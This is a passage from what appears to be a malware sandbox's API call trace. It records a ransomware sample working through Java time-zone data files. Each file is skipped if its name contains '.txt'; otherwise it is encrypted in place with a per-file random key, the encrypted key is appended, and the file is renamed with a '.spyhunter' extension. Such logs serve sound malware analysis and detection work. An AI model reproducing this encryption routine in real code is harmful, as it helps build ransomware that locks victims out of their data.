(x86)\\java\\jre7\\lib\\zi\\africa\\ceuta.spyhunter")) returned 1 [0125.930] GetProcessHeap () returned 0x2c0000 [0125.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0125.930] GetProcessHeap () returned 0x2c0000 [0125.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0125.930] GetProcessHeap () returned 0x2c0000 [0125.930] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60900 | out: hHeap=0x2c0000) returned 1 [0125.930] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf778 | out: pbBuffer=0x25cf778) returned 1 [0125.930] GetProcessHeap () returned 0x2c0000 [0125.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0125.930] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf770*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf770*=0x30) returned 1 [0125.930] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\casablanca"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0125.931] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca") returned 61 [0125.931] StrStrW (lpFirst="Casablanca", lpSrch=".txt") returned 0x0 [0125.931] GetProcessHeap () returned 0x2c0000 [0125.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0125.931] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf734, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf734*=0x350, lpOverlapped=0x0) returned 1 [0126.430] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffcb0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.430] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x350, lpNumberOfBytesWritten=0x25cf734, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf734*=0x350, lpOverlapped=0x0) returned 1 [0126.430] GetProcessHeap () returned 0x2c0000 [0126.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.430] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.430] WriteFile (in: hFile=0x170, lpBuffer=0x25cf774*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf734, lpOverlapped=0x0 | out: lpBuffer=0x25cf774*, lpNumberOfBytesWritten=0x25cf734*=0x4, lpOverlapped=0x0) returned 1 [0126.430] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf734, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf734*=0x30, lpOverlapped=0x0) returned 1 [0126.430] CloseHandle (hObject=0x170) returned 1 [0126.430] GetProcessHeap () returned 0x2c0000 [0126.430] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.431] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca.spyhunter") returned 71 [0126.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\casablanca"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Casablanca.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\casablanca.spyhunter")) returned 1 [0126.431] GetProcessHeap () returned 0x2c0000 [0126.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.431] GetProcessHeap () returned 0x2c0000 [0126.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.431] GetProcessHeap () returned 0x2c0000 [0126.431] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc0118 | out: hHeap=0x2c0000) returned 1 [0126.432] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf770 | out: pbBuffer=0x25cf770) returned 1 [0126.432] GetProcessHeap () returned 0x2c0000 [0126.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.432] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf768*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf768*=0x30) returned 1 [0126.432] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\cairo"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.438] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo") returned 56 [0126.438] StrStrW (lpFirst="Cairo", lpSrch=".txt") returned 0x0 [0126.438] GetProcessHeap () returned 0x2c0000 [0126.438] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.438] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf72c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf72c*=0x419, lpOverlapped=0x0) returned 1 [0126.483] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xfffffbe7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.483] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x419, lpNumberOfBytesWritten=0x25cf72c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf72c*=0x419, lpOverlapped=0x0) returned 1 [0126.483] GetProcessHeap () returned 0x2c0000 [0126.483] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.483] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.483] WriteFile (in: hFile=0x170, lpBuffer=0x25cf76c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf72c, lpOverlapped=0x0 | out: lpBuffer=0x25cf76c*, lpNumberOfBytesWritten=0x25cf72c*=0x4, lpOverlapped=0x0) returned 1 [0126.483] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf72c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf72c*=0x30, lpOverlapped=0x0) returned 1 [0126.484] CloseHandle (hObject=0x170) returned 1 [0126.484] GetProcessHeap () returned 0x2c0000 [0126.484] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.484] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo.spyhunter") returned 66 [0126.484] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\cairo"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Cairo.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\cairo.spyhunter")) returned 1 [0126.485] GetProcessHeap () returned 0x2c0000 [0126.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.485] GetProcessHeap () returned 0x2c0000 [0126.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.485] GetProcessHeap () returned 0x2c0000 [0126.485] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60840 | out: hHeap=0x2c0000) returned 1 [0126.485] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf770 | out: pbBuffer=0x25cf770) returned 1 [0126.485] GetProcessHeap () returned 0x2c0000 [0126.485] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.485] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf768*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf768*=0x30) returned 1 [0126.485] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bujumbura"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.486] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura") returned 60 [0126.486] StrStrW (lpFirst="Bujumbura", lpSrch=".txt") returned 0x0 [0126.486] GetProcessHeap () returned 0x2c0000 [0126.486] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.486] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf72c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf72c*=0x1b, lpOverlapped=0x0) returned 1 [0126.487] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffe5, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.487] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x1b, lpNumberOfBytesWritten=0x25cf72c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf72c*=0x1b, lpOverlapped=0x0) returned 1 [0126.487] GetProcessHeap () returned 0x2c0000 [0126.487] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.487] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.487] WriteFile (in: hFile=0x170, lpBuffer=0x25cf76c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf72c, lpOverlapped=0x0 | out: lpBuffer=0x25cf76c*, lpNumberOfBytesWritten=0x25cf72c*=0x4, lpOverlapped=0x0) returned 1 [0126.488] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf72c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf72c*=0x30, lpOverlapped=0x0) returned 1 [0126.488] CloseHandle (hObject=0x170) returned 1 [0126.488] GetProcessHeap () returned 0x2c0000 [0126.488] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.488] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura.spyhunter") returned 70 [0126.488] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bujumbura"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bujumbura.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bujumbura.spyhunter")) returned 1 [0126.488] GetProcessHeap () returned 0x2c0000 [0126.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.489] GetProcessHeap () returned 0x2c0000 [0126.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.489] GetProcessHeap () returned 0x2c0000 [0126.489] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cc0050 | out: hHeap=0x2c0000) returned 1 [0126.489] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf768 | out: pbBuffer=0x25cf768) returned 1 [0126.489] GetProcessHeap () returned 0x2c0000 [0126.489] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.489] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf760*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf760*=0x30) returned 1 [0126.489] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\brazzaville"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.490] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville") returned 62 [0126.490] StrStrW (lpFirst="Brazzaville", lpSrch=".txt") returned 0x0 [0126.490] GetProcessHeap () returned 0x2c0000 [0126.490] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.490] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf724, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf724*=0x41, lpOverlapped=0x0) returned 1 [0126.491] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.491] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf724, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf724*=0x41, lpOverlapped=0x0) returned 1 [0126.491] GetProcessHeap () returned 0x2c0000 [0126.491] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.491] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.491] WriteFile (in: hFile=0x170, lpBuffer=0x25cf764*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf724, lpOverlapped=0x0 | out: lpBuffer=0x25cf764*, lpNumberOfBytesWritten=0x25cf724*=0x4, lpOverlapped=0x0) returned 1 [0126.492] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf724, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf724*=0x30, lpOverlapped=0x0) returned 1 [0126.492] CloseHandle (hObject=0x170) returned 1 [0126.492] GetProcessHeap () returned 0x2c0000 [0126.492] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.492] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville.spyhunter") returned 72 [0126.492] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\brazzaville"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Brazzaville.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\brazzaville.spyhunter")) returned 1 [0126.492] GetProcessHeap () returned 0x2c0000 [0126.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.493] GetProcessHeap () returned 0x2c0000 [0126.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.493] GetProcessHeap () returned 0x2c0000 [0126.493] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfad8 | out: hHeap=0x2c0000) returned 1 [0126.493] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf768 | out: pbBuffer=0x25cf768) returned 1 [0126.493] GetProcessHeap () returned 0x2c0000 [0126.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.493] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf760*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf760*=0x30) returned 1 [0126.493] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\blantyre"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.493] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre") returned 59 [0126.493] StrStrW (lpFirst="Blantyre", lpSrch=".txt") returned 0x0 [0126.493] GetProcessHeap () returned 0x2c0000 [0126.493] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.494] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf724, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf724*=0x41, lpOverlapped=0x0) returned 1 [0126.494] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.494] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x25cf724, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf724*=0x41, lpOverlapped=0x0) returned 1 [0126.495] GetProcessHeap () returned 0x2c0000 [0126.495] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.495] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.495] WriteFile (in: hFile=0x170, lpBuffer=0x25cf764*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf724, lpOverlapped=0x0 | out: lpBuffer=0x25cf764*, lpNumberOfBytesWritten=0x25cf724*=0x4, lpOverlapped=0x0) returned 1 [0126.495] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf724, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf724*=0x30, lpOverlapped=0x0) returned 1 [0126.495] CloseHandle (hObject=0x170) returned 1 [0126.495] GetProcessHeap () returned 0x2c0000 [0126.495] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.495] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre.spyhunter") returned 69 [0126.495] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\blantyre"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Blantyre.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\blantyre.spyhunter")) returned 1 [0126.496] GetProcessHeap () returned 0x2c0000 [0126.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.496] GetProcessHeap () returned 0x2c0000 [0126.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.496] GetProcessHeap () returned 0x2c0000 [0126.496] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60780 | out: hHeap=0x2c0000) returned 1 [0126.496] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf760 | out: pbBuffer=0x25cf760) returned 1 [0126.496] GetProcessHeap () returned 0x2c0000 [0126.496] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.496] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf758*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf758*=0x30) returned 1 [0126.496] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bissau"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.497] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau") returned 57 [0126.498] StrStrW (lpFirst="Bissau", lpSrch=".txt") returned 0x0 [0126.498] GetProcessHeap () returned 0x2c0000 [0126.498] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.498] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf71c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x25cf71c*=0x4d, lpOverlapped=0x0) returned 1 [0126.499] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0xffffffb3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0126.499] WriteFile (in: hFile=0x170, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4d, lpNumberOfBytesWritten=0x25cf71c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x25cf71c*=0x4d, lpOverlapped=0x0) returned 1 [0126.499] GetProcessHeap () returned 0x2c0000 [0126.499] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0126.499] SetFilePointerEx (in: hFile=0x170, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0126.499] WriteFile (in: hFile=0x170, lpBuffer=0x25cf75c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25cf71c, lpOverlapped=0x0 | out: lpBuffer=0x25cf75c*, lpNumberOfBytesWritten=0x25cf71c*=0x4, lpOverlapped=0x0) returned 1 [0126.499] WriteFile (in: hFile=0x170, lpBuffer=0x31f098*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25cf71c, lpOverlapped=0x0 | out: lpBuffer=0x31f098*, lpNumberOfBytesWritten=0x25cf71c*=0x30, lpOverlapped=0x0) returned 1 [0126.499] CloseHandle (hObject=0x170) returned 1 [0126.499] GetProcessHeap () returned 0x2c0000 [0126.499] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.499] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau.spyhunter") returned 67 [0126.500] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bissau"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Bissau.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\bissau.spyhunter")) returned 1 [0126.501] GetProcessHeap () returned 0x2c0000 [0126.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.501] GetProcessHeap () returned 0x2c0000 [0126.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0126.501] GetProcessHeap () returned 0x2c0000 [0126.501] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e606c0 | out: hHeap=0x2c0000) returned 1 [0126.501] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25cf760 | out: pbBuffer=0x25cf760) returned 1 [0126.501] GetProcessHeap () returned 0x2c0000 [0126.501] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0126.501] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x25cf758*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x25cf758*=0x30) returned 1 [0126.501] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\africa\\banjul"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x170 [0126.502] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Africa\\Banjul") returned 57 [0126.502] StrStrW (lpFirst="Banjul", lpSrch=".txt") returned 0x0 [0126.502] GetProcessHeap () returned 0x2c0000 [0126.502] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0126.502] ReadFile (in: hFile=0x170, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25cf71c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, 